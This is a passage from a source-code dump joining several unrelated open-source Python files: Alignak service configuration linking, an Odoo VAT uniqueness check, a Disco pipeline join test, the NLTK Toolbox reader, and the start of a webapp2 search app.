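    # ["generic-service"] is temporarily indexed under the key
    # "Load::generic-service" until inheritance has been applied and it is
    # re-added as a normal item.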
# Inheritance for just a property
def apply_partial_inheritance(self, prop):
for i in itertools.chain(self.items.itervalues(),
self.partial_services.itervalues(),
self.templates.itervalues()):
i.get_property_by_inheritance(prop)
# If a "null" attribute was inherited, delete it
try:
if getattr(i, prop) == 'null':
delattr(i, prop)
except AttributeError:
pass
    def apply_inheritance(self):
        """ For all items and templates, inherit properties and custom
        variables.
"""
        # We check for all Class properties if the host has it;
        # if not, it checks all host templates for a value
cls = self.inner_class
for prop in cls.properties:
self.apply_partial_inheritance(prop)
for i in itertools.chain(self.items.itervalues(),
self.partial_services.itervalues(),
self.templates.itervalues()):
i.get_customs_properties_by_inheritance()
for i in self.partial_services.itervalues():
self.add_item(i, True, True)
del self.partial_services
del self.name_to_partial
def linkify_templates(self):
# First we create a list of all templates
for i in itertools.chain(self.items.itervalues(),
self.partial_services.itervalues(),
self.templates.itervalues()):
self.linkify_item_templates(i)
for i in self:
i.tags = self.get_all_tags(i)
# Search for all of the services in a host
def find_srvs_by_hostname(self, host_name):
if hasattr(self, 'hosts'):
h = self.hosts.find_by_name(host_name)
if h is None:
return None
return h.get_services()
return None
    # Search for a service by its name and host_name
def find_srv_by_name_and_hostname(self, host_name, sdescr):
key = (host_name, sdescr)
return self.name_to_item.get(key, None)
# Make link between elements:
# service -> host
# service -> command
# service -> timeperiods
# service -> contacts
def linkify(self, hosts, commands, timeperiods, contacts,
resultmodulations, businessimpactmodulations, escalations,
servicegroups, triggers, checkmodulations, macromodulations):
self.linkify_with_timeperiods(timeperiods, 'notification_period')
self.linkify_with_timeperiods(timeperiods, 'check_period')
self.linkify_with_timeperiods(timeperiods, 'maintenance_period')
self.linkify_with_timeperiods(timeperiods, 'snapshot_period')
self.linkify_s_by_hst(hosts)
self.linkify_s_by_sg(servicegroups)
self.linkify_one_command_with_commands(commands, 'check_command')
self.linkify_one_command_with_commands(commands, 'event_handler')
self.linkify_one_command_with_commands(commands, 'snapshot_command')
self.linkify_with_contacts(contacts)
self.linkify_with_resultmodulations(resultmodulations)
self.linkify_with_business_impact_modulations(businessimpactmodulations)
        # WARNING: not all escalations will be linked here
        # (just the escalations, not serviceesca or hostesca).
        # Those last ones will be linked in the escalations linkify.
self.linkify_with_escalations(escalations)
self.linkify_with_triggers(triggers)
self.linkify_with_checkmodulations(checkmodulations)
self.linkify_with_macromodulations(macromodulations)
def override_properties(self, hosts):
ovr_re = re.compile(r'^([^,]+),([^\s]+)\s+(.*)$')
ovr_hosts = [h for h in hosts if getattr(h, 'service_overrides', None)]
for host in ovr_hosts:
# We're only looking for hosts having service overrides defined
if isinstance(host.service_overrides, list):
service_overrides = host.service_overrides
else:
service_overrides = [host.service_overrides]
for ovr in service_overrides:
# Checks service override syntax
match = ovr_re.search(ovr)
if match is None:
err = "Error: invalid service override syntax: %s" % ovr
host.configuration_errors.append(err)
continue
sdescr, prop, value = match.groups()
# Looks for corresponding service
service = self.find_srv_by_name_and_hostname(
getattr(host, "host_name", ""), sdescr
)
if service is None:
err = "Error: trying to override property '%s' on service '%s' " \
"but it's unknown for this host" % (prop, sdescr)
host.configuration_errors.append(err)
continue
# Checks if override is allowed
excludes = ['host_name', 'service_description', 'use',
'servicegroups', 'trigger', 'trigger_name']
if prop in excludes:
err = "Error: trying to override '%s', a forbidden property for service '%s'" % \
(prop, sdescr)
host.configuration_errors.append(err)
continue
# Pythonize the value because here value is str.
setattr(service, prop, service.properties[prop].pythonize(value))
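    # Illustrative example of the service_overrides syntax matched above
    # (hypothetical values): a host line like
    #   service_overrides   Load,notification_interval 90
    # overrides notification_interval to 90 on that host's 'Load' service.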
# We can link services with hosts so
# We can search in O(hosts) instead
# of O(services) for common cases
def optimize_service_search(self, hosts):
self.hosts = hosts
    # We just search for each service the id of its host
    # and replace the name by the id,
    # + inform the host that we are one of its services
def linkify_s_by_hst(self, hosts):
for s in self:
# If we do not have a host_name, we set it as
# a template element to delete. (like Nagios)
if not hasattr(s, 'host_name'):
s.host = None
continue
try:
hst_name = s.host_name
# The new member list, in id
hst = hosts.find_by_name(hst_name)
s.host = hst
# Let the host know we are his service
if s.host is not None:
hst.add_service_link(s)
                else:  # Ok, the host does not exist!
                    err = "Warning: the service '%s' got an invalid host_name '%s'" % \
                          (s.get_name(), hst_name)
s.configuration_warnings.append(err)
continue
except AttributeError, exp:
                pass  # Will be caught at the is_correct moment
# We look for servicegroups property in services and
# link them
def linkify_s_by_sg(self, servicegroups):
for s in self:
new_servicegroups = []
if hasattr(s, 'servicegroups') and s.servicegroups != '':
for sg_name in s.servicegroups:
sg_name = sg_name.strip()
sg = servicegroups.find_by_name(sg_name)
if sg is not None:
new_servicegroups.append(sg)
else:
err = "Error: the servicegroup '%s' of the service '%s' is unknown" %\
(sg_name, s.get_dbg_name())
s.configuration_errors.append(err)
s.servicegroups = new_servicegroups
# Delete services by ids
def delete_services_by_id(self, ids):
for id in ids:
del self[id]
# Apply implicit inheritance for special properties:
    # contact_groups, notification_interval, notification_period.
    # So the service will take info from the host if necessary
def apply_implicit_inheritance(self, hosts):
for prop in ('contacts', 'contact_groups', 'notification_interval',
'notification_period', 'resultmodulations', 'business_impact_modulations',
'escalations', 'poller_tag', 'reactionner_tag', 'check_period',
'business_impact', 'maintenance_period'):
for s in self:
if not hasattr(s, prop) and hasattr(s, 'host_name'):
h = hosts.find_by_name(s.host_name)
if h is not None and hasattr(h, prop):
setattr(s, prop, getattr(h, prop))
# Create dependencies for services (daddy ones)
def apply_dependencies(self):
for s in self:
s.fill_daddy_dependency()
    # For services the main clean is about services with bad hosts
def clean(self):
to_del = []
for s in self:
if not s.host:
to_del.append(s.id)
for sid in to_del:
del self.items[sid]
def explode_services_from_hosts(self, hosts, s, hnames):
"""
        Explodes a service based on a list of hosts.
:param hosts: The hosts container
:param s: The base service to explode
        :param hnames: The host_name list to explode the service on
"""
duplicate_for_hosts = [] # get the list of our host_names if more than 1
not_hosts = [] # the list of !host_name so we remove them after
for hname in hnames:
hname = hname.strip()
            # If the name begins with a !, we put it in
            # the not list
if hname.startswith('!'):
not_hosts.append(hname[1:])
else: # the standard list
duplicate_for_hosts.append(hname)
# remove duplicate items from duplicate_for_hosts:
duplicate_for_hosts = list(set(duplicate_for_hosts))
        # Ok now we clean the duplicate_for_hosts with all hosts
        # of the not_hosts list
        for hname in not_hosts:
            try:
                duplicate_for_hosts.remove(hname)
            except ValueError:
pass
# Now we duplicate the service for all host_names
for hname in duplicate_for_hosts:
h = hosts.find_by_name(hname)
if h is None:
err = 'Error: The hostname %s is unknown for the ' \
'service %s!' % (hname, s.get_name())
s.configuration_errors.append(err)
continue
if h.is_excluded_for(s):
continue
new_s = s.copy()
new_s.host_name = hname
self.add_item(new_s)
def _local_create_service(self, hosts, host_name, service):
'''Create a new service based on a host_name and service instance.
:param hosts: The hosts items instance.
:type hosts: alignak.objects.host.Hosts
:param host_name: The host_name to create a new service.
:param service: The service to be used as template.
:type service: Service
:return: The new service created.
:rtype: Service
'''
h = hosts.find_by_name(host_name.strip())
if h.is_excluded_for(service):
return
# Creates concrete instance
new_s = service.copy()
new_s.host_name = host_name
new_s.register = 1
self.add_item(new_s)
return new_s
def explode_services_from_templates(self, hosts, service):
"""
        Explodes services from templates. All hosts holding the specified
        templates are bound to the service.
:param hosts: The hosts container.
:type hosts: alignak.objects.host.Hosts
:param service: The service to explode.
:type service: Service
"""
hname = getattr(service, "host_name", None)
if not hname:
return
# Now really create the services
if is_complex_expr(hname):
hnames = self.evaluate_hostgroup_expression(
hname.strip(), hosts, hosts.templates, look_in='templates')
for name in hnames:
self._local_create_service(hosts, name, service)
else:
hnames = [n.strip() for n in hname.split(',') if n.strip()]
for hname in hnames:
for name in hosts.find_hosts_that_use_template(hname):
self._local_create_service(hosts, name, service)
def explode_services_duplicates(self, hosts, s):
"""
Explodes services holding a `duplicate_foreach` clause.
:param hosts: The hosts container
:param s: The service to explode
:type s: Service
"""
hname = getattr(s, "host_name", None)
if hname is None:
return
# the generator case, we must create several new services
# we must find our host, and get all key:value we need
h = hosts.find_by_name(hname.strip())
if h is None:
err = 'Error: The hostname %s is unknown for the ' \
'service %s!' % (hname, s.get_name())
s.configuration_errors.append(err)
return
# Duplicate services
for new_s in s.duplicate(h):
if h.is_excluded_for(new_s):
continue
# Adds concrete instance
self.add_item(new_s)
def register_service_into_servicegroups(self, s, servicegroups):
"""
Registers a service into the service groups declared in its
`servicegroups` attribute.
:param s: The service to register
:param servicegroups: The servicegroups container
"""
if hasattr(s, 'service_description'):
sname = s.service_description
shname = getattr(s, 'host_name', '')
if hasattr(s, 'servicegroups'):
# Todo: See if we can remove this if
if isinstance(s.servicegroups, list):
sgs = s.servicegroups
else:
sgs = s.servicegroups.split(',')
for sg in sgs:
servicegroups.add_member([shname, sname], sg.strip())
def register_service_dependencies(self, s, servicedependencies):
"""
        Registers a service's dependencies.
:param s: The service to register
:param servicedependencies: The servicedependencies container
"""
        # We explode service_dependencies into Servicedependency objects.
        # We just create serviceDep with good values (as STRINGs!),
        # the link pass will be done afterwards
sdeps = [d.strip() for d in
getattr(s, "service_dependencies", [])]
        # Even indexes (i % 2 == 0) are host names, odd ones are service_descriptions
i = 0
hname = ''
for elt in sdeps:
if i % 2 == 0: # host
hname = elt
else: # description
desc = elt
# we can register it (s) (depend on) -> (hname, desc)
# If we do not have enough data for s, it's no use
if hasattr(s, 'service_description') and hasattr(s, 'host_name'):
if hname == '':
hname = s.host_name
servicedependencies.add_service_dependency(
s.host_name, s.service_description, hname, desc)
i += 1
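    # Illustrative example for register_service_dependencies above
    # (hypothetical values): with service_dependencies ["srv1", "Load", "", "DB"]
    # the service depends on the 'Load' service of host 'srv1' and on the
    # 'DB' service of its own host (an empty host entry falls back to
    # s.host_name).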
# We create new service if necessary (host groups and co)
def explode(self, hosts, hostgroups, contactgroups,
servicegroups, servicedependencies, triggers):
"""
        Explodes services, from host_name, hostgroup_name, and from templates.
        :param hosts: The hosts container
        :param hostgroups: The hostgroups container
        :param contactgroups: The contactgroups container
        :param servicegroups: The servicegroups container
:param servicedependencies: The servicedependencies container
:param triggers: The triggers container
"""
# items::explode_trigger_string_into_triggers
self.explode_trigger_string_into_triggers(triggers)
# Then for every host create a copy of the service with just the host
# because we are adding services, we can't just loop in it
for id in self.items.keys():
s = self.items[id]
# items::explode_host_groups_into_hosts
# take all hosts from our hostgroup_name into our host_name property
self.explode_host_groups_into_hosts(s, hosts, hostgroups)
# items::explode_contact_groups_into_contacts
# take all contacts from our contact_groups into our contact property
self.explode_contact_groups_into_contacts(s, contactgroups)
hnames = getattr(s, "host_name", '')
hnames = list(set([n.strip() for n in hnames.split(',') if n.strip()]))
# hnames = strip_and_uniq(hnames)
# We will duplicate if we have multiple host_name
# or if we are a template (so a clean service)
if len(hnames) == 1:
self.index_item(s)
else:
if len(hnames) >= 2:
self.explode_services_from_hosts(hosts, s, hnames)
# Delete expanded source service
if not s.configuration_errors:
self.remove_item(s)
for id in self.templates.keys():
t = self.templates[id]
self.explode_contact_groups_into_contacts(t, contactgroups)
self.explode_services_from_templates(hosts, t)
# Explode services that have a duplicate_foreach clause
duplicates = [s.id for s in self if getattr(s, 'duplicate_foreach', '')]
for id in duplicates:
s = self.items[id]
self.explode_services_duplicates(hosts, s)
if not s.configuration_errors:
self.remove_item(s)
to_remove = []
for service in self:
host = hosts.find_by_name(service.host_name)
if host and host.is_excluded_for(service):
to_remove.append(service)
for service in to_remove:
self.remove_item(service)
        # The servicegroups property needs to be filled in to get the information
        # and then we just register to this servicegroup
for s in self:
self.register_service_into_servicegroups(s, servicegroups)
self.register_service_dependencies(s, servicedependencies)
    # Will create all business rule trees for the
    # services
def create_business_rules(self, hosts, services):
for s in self:
s.create_business_rules(hosts, services)
    # Will link all business services/hosts with their
    # dependencies for the problem/impact links
def create_business_rules_dependencies(self):
for s in self:
s.create_business_rules_dependencies()
| agpl-3.0 | -2,788,228,608,407,813,600 | 42.769064 | 117 | 0.572452 | false |
ingadhoc/odoo-addons | partner_vat_unique/partner.py | 10 | 1390 | # -*- encoding: utf-8 -*-
from openerp import models, api, _
from openerp.exceptions import Warning
class res_partner(models.Model):
_inherit = "res.partner"
@api.one
@api.constrains('vat', 'parent_id', 'company_id')
def check_vat_unique(self):
if not self.vat:
return True
# get first parent
parent = self
while parent.parent_id:
parent = parent.parent_id
same_vat_partners = self.search([
('vat', '=', self.vat),
('vat', '!=', False),
('company_id', '=', self.company_id.id),
])
if same_vat_partners:
related_partners = self.search([
('id', 'child_of', parent.id),
('company_id', '=', self.company_id.id),
])
same_vat_partners = self.search([
('id', 'in', same_vat_partners.ids),
('id', 'not in', related_partners.ids),
('company_id', '=', self.company_id.id),
])
if same_vat_partners:
raise Warning(_(
                    'Partner vat must be unique per company except on partners with a parent/child relationship. Partners with the same vat that are not related are: %s!') % (', '.join(x.name for x in same_vat_partners)))
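        # In short: another partner may share this VAT only when it belongs
        # to the same parent/child family (child_of the topmost parent)
        # within the same company; any unrelated partner with the same VAT
        # triggers the Warning above.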
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -9,106,443,438,993,461,000 | 33.75 | 211 | 0.52518 | false |
pombredanne/disco | tests/test_query.py | 11 | 3805 | from disco.test import TestCase, TestPipe
from disco.compat import bytes_to_str, str_to_bytes
from disco.worker.pipeline.worker import Stage
from disco.worker.task_io import task_input_stream
import csv
from functools import partial
import hashlib
PREFIX='/tmp/'
def read(interface, state, label, inp):
from disco import util
for e in inp:
scheme, netloc, _ = util.urlsplit(e)
fileName, joinColumn = str(netloc).split('?')
File = open(PREFIX + fileName, 'r')
col = int(joinColumn)
reader = csv.reader(File)
firstRow = True
for row in reader:
if firstRow:
tableName = row[0]
firstRow = False
else:
fullName = tableName + '?' + str(col)
Hash = int(hashlib.md5(str_to_bytes(row[col])).hexdigest(), 16) % 160
interface.output(Hash).add(fullName, row)
def join_init(interface, params):
return {}
def join(interface, state, label, inp):
for k, v in inp:
if k not in state:
state[k] = [v]
else:
state[k].append(v)
def join_done(interface, state):
if len(state) != 2:
return
name0 = list(state.keys())[0]
name1 = list(state.keys())[1]
_, strCol0 = name0.split('?')
_, strCol1 = name1.split('?')
col0 = int(strCol0)
col1 = int(strCol1)
for entry0 in state[name0]:
for entry1 in state[name1]:
if entry0[col0] == entry1[col1]:
entry0_copy = entry0[:]
entry1_copy = entry1[:]
del entry0_copy[col0]
del entry1_copy[col1]
interface.output(0).add(entry0[col0], entry0_copy + entry1_copy)
def combine_init(interface, params, init):
return init()
def combine(interface, state, label, inp, func):
for k, v in inp:
func(state, k, v)
def combine_done(interface, state):
for k, v in state.items():
interface.output(0).add(k, v)
def _getPipeline():
select_stage = [("split", Stage('read', process=read))]
join_stage = [("group_label", Stage('join', init=join_init, process=join, done=join_done))]
def combine_row(state, k, v, func):
if k not in state:
state[k] = 0
state[k] = state[k] + func(v)
node_combine_stage = [("group_node_label",
Stage('node_combine', init=partial(combine_init, init=lambda: {}),
process=partial(combine, func=partial(combine_row, func=lambda v: 1)),
done=combine_done))]
combine_all_stage = [("group_label",
Stage('combine_all', init=partial(combine_init, init=lambda: {}),
process=partial(combine, func=partial(combine_row, func=lambda v: v)),
done=combine_done))]
return select_stage + join_stage + node_combine_stage + combine_all_stage
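# The pipeline built above reads the CSV inputs and hash-partitions each row
# on its join column, joins the two tables per label, counts the joined rows
# per key on every node, and finally sums those partial counts globally.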
class PipeJob(TestPipe):
pipeline = _getPipeline()
class JoinTestCase(TestCase):
#input contains the file name and the join column
input = ['raw://cities.csv?0', 'raw://packages.csv?3']
def SetUpFiles(self):
F1 = open(PREFIX + 'cities.csv', 'w')
F1.write("cities\nEdmonton,-45\nCalgary,-35\nMontreal,-25\nToronto,-15\n")
F1.close()
F2 = open(PREFIX + 'packages.csv', 'w')
F2.write("packages\n0,2013-10-2,2013-11-3,Edmonton,Calgary\n" +
"1,2013-11-3,2013-12-3,Calgary,Toronto\n" +
"2,2013-10-4,2013-10-6,Edmonton,Montreal\n")
F2.close()
def serve(self, path):
return path
def test_per_node(self):
self.SetUpFiles()
self.job = PipeJob().run(input=self.test_server.urls(self.input))
self.assertEqual(sorted(self.results(self.job)), [('Calgary', 1), ('Edmonton', 2)])
| bsd-3-clause | 4,564,912,458,981,070,300 | 31.521368 | 95 | 0.58134 | false |
xujun10110/golismero | thirdparty_libs/nltk/toolbox.py | 12 | 17953 | # Natural Language Toolkit: Toolbox Reader
#
# Copyright (C) 2001-2012 NLTK Project
# Author: Greg Aumann <[email protected]>
# URL: <http://nltk.org>
# For license information, see LICENSE.TXT
"""
Module for reading, writing and manipulating
Toolbox databases and settings files.
"""
import os, re, codecs
from StringIO import StringIO
from xml.etree import ElementTree
from xml.etree.ElementTree import TreeBuilder, Element, SubElement
from nltk.data import PathPointer, ZipFilePathPointer, find
class StandardFormat(object):
"""
Class for reading and processing standard format marker files and strings.
"""
def __init__(self, filename=None, encoding=None):
self._encoding = encoding
if filename is not None:
self.open(filename)
def open(self, sfm_file):
"""
Open a standard format marker file for sequential reading.
:param sfm_file: name of the standard format marker input file
:type sfm_file: str
"""
if isinstance(sfm_file, PathPointer):
# [xx] We don't use 'rU' mode here -- do we need to?
# (PathPointer.open doesn't take a mode option)
self._file = sfm_file.open(self._encoding)
else:
self._file = codecs.open(sfm_file, 'rU', self._encoding)
def open_string(self, s):
"""
Open a standard format marker string for sequential reading.
:param s: string to parse as a standard format marker input file
:type s: str
"""
self._file = StringIO(s)
def raw_fields(self):
"""
Return an iterator that returns the next field in a (marker, value)
tuple. Linebreaks and trailing white space are preserved except
for the final newline in each field.
:rtype: iter(tuple(str, str))
"""
join_string = '\n'
line_regexp = r'^%s(?:\\(\S+)\s*)?(.*)$'
# discard a BOM in the first line
first_line_pat = re.compile(line_regexp % u'(?:\ufeff)?'.encode('utf8'))
line_pat = re.compile(line_regexp % '')
# need to get first line outside the loop for correct handling
# of the first marker if it spans multiple lines
file_iter = iter(self._file)
line = file_iter.next()
mobj = re.match(first_line_pat, line)
mkr, line_value = mobj.groups()
value_lines = [line_value,]
self.line_num = 0
for line in file_iter:
self.line_num += 1
mobj = re.match(line_pat, line)
line_mkr, line_value = mobj.groups()
if line_mkr:
yield (mkr, join_string.join(value_lines))
mkr = line_mkr
value_lines = [line_value,]
else:
value_lines.append(line_value)
self.line_num += 1
yield (mkr, join_string.join(value_lines))
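    # Illustrative example for raw_fields above: an input line "\lx kaa"
    # followed by a continuation line "more" (no backslash marker) is
    # yielded as a single field ('lx', 'kaa\nmore').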
def fields(self, strip=True, unwrap=True, encoding=None, errors='strict', unicode_fields=None):
"""
Return an iterator that returns the next field in a ``(marker, value)``
tuple, where ``marker`` and ``value`` are unicode strings if an ``encoding``
was specified in the ``fields()`` method. Otherwise they are non-unicode strings.
:param strip: strip trailing whitespace from the last line of each field
:type strip: bool
:param unwrap: Convert newlines in a field to spaces.
:type unwrap: bool
:param encoding: Name of an encoding to use. If it is specified then
the ``fields()`` method returns unicode strings rather than non
unicode strings.
:type encoding: str or None
:param errors: Error handling scheme for codec. Same as the ``decode()``
builtin string method.
:type errors: str
:param unicode_fields: Set of marker names whose values are UTF-8 encoded.
Ignored if encoding is None. If the whole file is UTF-8 encoded set
``encoding='utf8'`` and leave ``unicode_fields`` with its default
value of None.
:type unicode_fields: sequence
:rtype: iter(tuple(str, str))
"""
if encoding is None and unicode_fields is not None:
raise ValueError, 'unicode_fields is set but not encoding.'
unwrap_pat = re.compile(r'\n+')
for mkr, val in self.raw_fields():
if encoding:
if unicode_fields is not None and mkr in unicode_fields:
val = val.decode('utf8', errors)
else:
val = val.decode(encoding, errors)
mkr = mkr.decode(encoding, errors)
if unwrap:
val = unwrap_pat.sub(' ', val)
if strip:
val = val.rstrip()
yield (mkr, val)
def close(self):
"""Close a previously opened standard format marker file or string."""
self._file.close()
try:
del self.line_num
except AttributeError:
pass
class ToolboxData(StandardFormat):
def parse(self, grammar=None, **kwargs):
if grammar:
return self._chunk_parse(grammar=grammar, **kwargs)
else:
return self._record_parse(**kwargs)
def _record_parse(self, key=None, **kwargs):
"""
Returns an element tree structure corresponding to a toolbox data file with
all markers at the same level.
Thus the following Toolbox database::
\_sh v3.0 400 Rotokas Dictionary
\_DateStampHasFourDigitYear
\lx kaa
\ps V.A
\ge gag
\gp nek i pas
\lx kaa
\ps V.B
\ge strangle
\gp pasim nek
after parsing will end up with the same structure (ignoring the extra
whitespace) as the following XML fragment after being parsed by
ElementTree::
<toolbox_data>
<header>
<_sh>v3.0 400 Rotokas Dictionary</_sh>
<_DateStampHasFourDigitYear/>
</header>
<record>
<lx>kaa</lx>
<ps>V.A</ps>
<ge>gag</ge>
<gp>nek i pas</gp>
</record>
<record>
<lx>kaa</lx>
<ps>V.B</ps>
<ge>strangle</ge>
<gp>pasim nek</gp>
</record>
</toolbox_data>
:param key: Name of key marker at the start of each record. If set to
None (the default value) the first marker that doesn't begin with
an underscore is assumed to be the key.
:type key: str
:param kwargs: Keyword arguments passed to ``StandardFormat.fields()``
:type kwargs: dict
:rtype: ElementTree._ElementInterface
:return: contents of toolbox data divided into header and records
"""
builder = TreeBuilder()
builder.start('toolbox_data', {})
builder.start('header', {})
in_records = False
for mkr, value in self.fields(**kwargs):
if key is None and not in_records and mkr[0] != '_':
key = mkr
if mkr == key:
if in_records:
builder.end('record')
else:
builder.end('header')
in_records = True
builder.start('record', {})
builder.start(mkr, {})
builder.data(value)
builder.end(mkr)
if in_records:
builder.end('record')
else:
builder.end('header')
builder.end('toolbox_data')
return builder.close()
def _tree2etree(self, parent):
from nltk.tree import Tree
root = Element(parent.node)
for child in parent:
if isinstance(child, Tree):
root.append(self._tree2etree(child))
else:
text, tag = child
e = SubElement(root, tag)
e.text = text
return root
def _chunk_parse(self, grammar=None, top_node='record', trace=0, **kwargs):
"""
Returns an element tree structure corresponding to a toolbox data file
parsed according to the chunk grammar.
:type grammar: str
:param grammar: Contains the chunking rules used to parse the
database. See ``chunk.RegExp`` for documentation.
:type top_node: str
:param top_node: The node value that should be used for the
top node of the chunk structure.
:type trace: int
:param trace: The level of tracing that should be used when
parsing a text. ``0`` will generate no tracing output;
``1`` will generate normal tracing output; and ``2`` or
higher will generate verbose tracing output.
:type kwargs: dict
:param kwargs: Keyword arguments passed to ``toolbox.StandardFormat.fields()``
:rtype: ElementTree._ElementInterface
"""
from nltk import chunk
from nltk.tree import Tree
cp = chunk.RegexpParser(grammar, top_node=top_node, trace=trace)
db = self.parse(**kwargs)
tb_etree = Element('toolbox_data')
header = db.find('header')
tb_etree.append(header)
for record in db.findall('record'):
parsed = cp.parse([(elem.text, elem.tag) for elem in record])
tb_etree.append(self._tree2etree(parsed))
return tb_etree
_is_value = re.compile(r"\S")
def to_sfm_string(tree, encoding=None, errors='strict', unicode_fields=None):
"""
Return a string with a standard format representation of the toolbox
data in tree (tree can be a toolbox database or a single record).
:param tree: flat representation of toolbox data (whole database or single record)
:type tree: ElementTree._ElementInterface
:param encoding: Name of an encoding to use.
:type encoding: str
:param errors: Error handling scheme for codec. Same as the ``encode()``
builtin string method.
:type errors: str
:param unicode_fields:
:type unicode_fields: dict(str) or set(str)
:rtype: str
"""
if tree.tag == 'record':
root = Element('toolbox_data')
root.append(tree)
tree = root
if tree.tag != 'toolbox_data':
raise ValueError, "not a toolbox_data element structure"
if encoding is None and unicode_fields is not None:
raise ValueError, \
"if encoding is not specified then neither should unicode_fields"
l = []
for rec in tree:
l.append('\n')
for field in rec:
mkr = field.tag
value = field.text
if encoding is not None:
if unicode_fields is not None and mkr in unicode_fields:
cur_encoding = 'utf8'
else:
cur_encoding = encoding
if re.search(_is_value, value):
l.append((u"\\%s %s\n" % (mkr, value)).encode(cur_encoding, errors))
else:
l.append((u"\\%s%s\n" % (mkr, value)).encode(cur_encoding, errors))
else:
if re.search(_is_value, value):
l.append("\\%s %s\n" % (mkr, value))
else:
l.append("\\%s%s\n" % (mkr, value))
return ''.join(l[1:])
class ToolboxSettings(StandardFormat):
"""This class is the base class for settings files."""
def __init__(self):
super(ToolboxSettings, self).__init__()
def parse(self, encoding=None, errors='strict', **kwargs):
"""
Return the contents of toolbox settings file with a nested structure.
:param encoding: encoding used by settings file
:type encoding: str
:param errors: Error handling scheme for codec. Same as ``decode()`` builtin method.
:type errors: str
:param kwargs: Keyword arguments passed to ``StandardFormat.fields()``
:type kwargs: dict
:rtype: ElementTree._ElementInterface
"""
builder = TreeBuilder()
for mkr, value in self.fields(encoding=encoding, errors=errors, **kwargs):
# Check whether the first char of the field marker
# indicates a block start (+) or end (-)
block=mkr[0]
if block in ("+", "-"):
mkr=mkr[1:]
else:
block=None
# Build tree on the basis of block char
if block == "+":
builder.start(mkr, {})
builder.data(value)
elif block == '-':
builder.end(mkr)
else:
builder.start(mkr, {})
builder.data(value)
builder.end(mkr)
return builder.close()
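    # Illustrative example for parse above (hypothetical markers): the lines
    #   \+block
    #   \mkr value
    #   \-block
    # produce a nested <block> element containing a <mkr> child with text
    # "value".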
def to_settings_string(tree, encoding=None, errors='strict', unicode_fields=None):
# write XML to file
l = list()
_to_settings_string(tree.getroot(), l, encoding=encoding, errors=errors, unicode_fields=unicode_fields)
return ''.join(l)
def _to_settings_string(node, l, **kwargs):
# write XML to file
tag = node.tag
text = node.text
if len(node) == 0:
if text:
l.append('\\%s %s\n' % (tag, text))
else:
l.append('\\%s\n' % tag)
else:
if text:
l.append('\\+%s %s\n' % (tag, text))
else:
l.append('\\+%s\n' % tag)
for n in node:
_to_settings_string(n, l, **kwargs)
l.append('\\-%s\n' % tag)
return
def remove_blanks(elem):
"""
Remove all elements and subelements with no text and no child elements.
:param elem: toolbox data in an elementtree structure
:type elem: ElementTree._ElementInterface
"""
out = list()
for child in elem:
remove_blanks(child)
if child.text or len(child) > 0:
out.append(child)
elem[:] = out
def add_default_fields(elem, default_fields):
"""
Add blank elements and subelements specified in default_fields.
:param elem: toolbox data in an elementtree structure
:type elem: ElementTree._ElementInterface
:param default_fields: fields to add to each type of element and subelement
:type default_fields: dict(tuple)
"""
for field in default_fields.get(elem.tag, []):
if elem.find(field) is None:
SubElement(elem, field)
for child in elem:
add_default_fields(child, default_fields)
def sort_fields(elem, field_orders):
"""
Sort the elements and subelements in order specified in field_orders.
:param elem: toolbox data in an elementtree structure
:type elem: ElementTree._ElementInterface
:param field_orders: order of fields for each type of element and subelement
:type field_orders: dict(tuple)
"""
order_dicts = dict()
for field, order in field_orders.items():
order_dicts[field] = order_key = dict()
for i, subfield in enumerate(order):
order_key[subfield] = i
_sort_fields(elem, order_dicts)
def _sort_fields(elem, orders_dicts):
"""sort the children of elem"""
try:
order = orders_dicts[elem.tag]
except KeyError:
pass
else:
tmp = [((order.get(child.tag, 1e9), i), child) for i, child in enumerate(elem)]
tmp.sort()
elem[:] = [child for key, child in tmp]
for child in elem:
if len(child):
_sort_fields(child, orders_dicts)
def add_blank_lines(tree, blanks_before, blanks_between):
"""
    Add blank lines before all elements and subelements specified in blanks_before.
    :param tree: toolbox data in an elementtree structure
    :type tree: ElementTree._ElementInterface
    :param blanks_before: elements and subelements to add blank lines before
    :type blanks_before: dict(tuple)
    :param blanks_between: elements and subelements to add blank lines between
    :type blanks_between: dict(tuple)
"""
try:
before = blanks_before[tree.tag]
between = blanks_between[tree.tag]
except KeyError:
for elem in tree:
if len(elem):
add_blank_lines(elem, blanks_before, blanks_between)
else:
last_elem = None
for elem in tree:
tag = elem.tag
if last_elem is not None and last_elem.tag != tag:
if tag in before and last_elem is not None:
e = last_elem.getiterator()[-1]
e.text = (e.text or "") + "\n"
else:
if tag in between:
e = last_elem.getiterator()[-1]
e.text = (e.text or "") + "\n"
if len(elem):
add_blank_lines(elem, blanks_before, blanks_between)
last_elem = elem
def demo():
from itertools import islice
# zip_path = find('corpora/toolbox.zip')
# lexicon = ToolboxData(ZipFilePathPointer(zip_path, 'toolbox/rotokas.dic')).parse()
file_path = find('corpora/toolbox/rotokas.dic')
lexicon = ToolboxData(file_path).parse()
print 'first field in fourth record:'
print lexicon[3][0].tag
print lexicon[3][0].text
print '\nfields in sequential order:'
for field in islice(lexicon.find('record'), 10):
print field.tag, field.text
print '\nlx fields:'
for field in islice(lexicon.findall('record/lx'), 10):
print field.text
settings = ToolboxSettings()
file_path = find('corpora/toolbox/MDF/MDF_AltH.typ')
settings.open(file_path)
# settings.open(ZipFilePathPointer(zip_path, entry='toolbox/MDF/MDF_AltH.typ'))
tree = settings.parse(unwrap=False, encoding='cp1252')
print tree.find('expset/expMDF/rtfPageSetup/paperSize').text
settings_tree = ElementTree(tree)
print to_settings_string(settings_tree).encode('utf8')
if __name__ == '__main__':
demo()
| gpl-2.0 | -2,184,836,355,627,718,400 | 35.122736 | 107 | 0.572272 | false |
devnook/cse-lrmi | main.py | 1 | 3718 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import jinja2
import os
import json
#import xmltodict
import webapp2
from webapp2_extras import routes
import logging
import urllib2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'])
class MainHandler(webapp2.RequestHandler):
def get(self):
template = jinja_environment.get_template('engine.html')
lrmi_properties = [
'Typical age range',
'Learning resource type',
'Educational use',
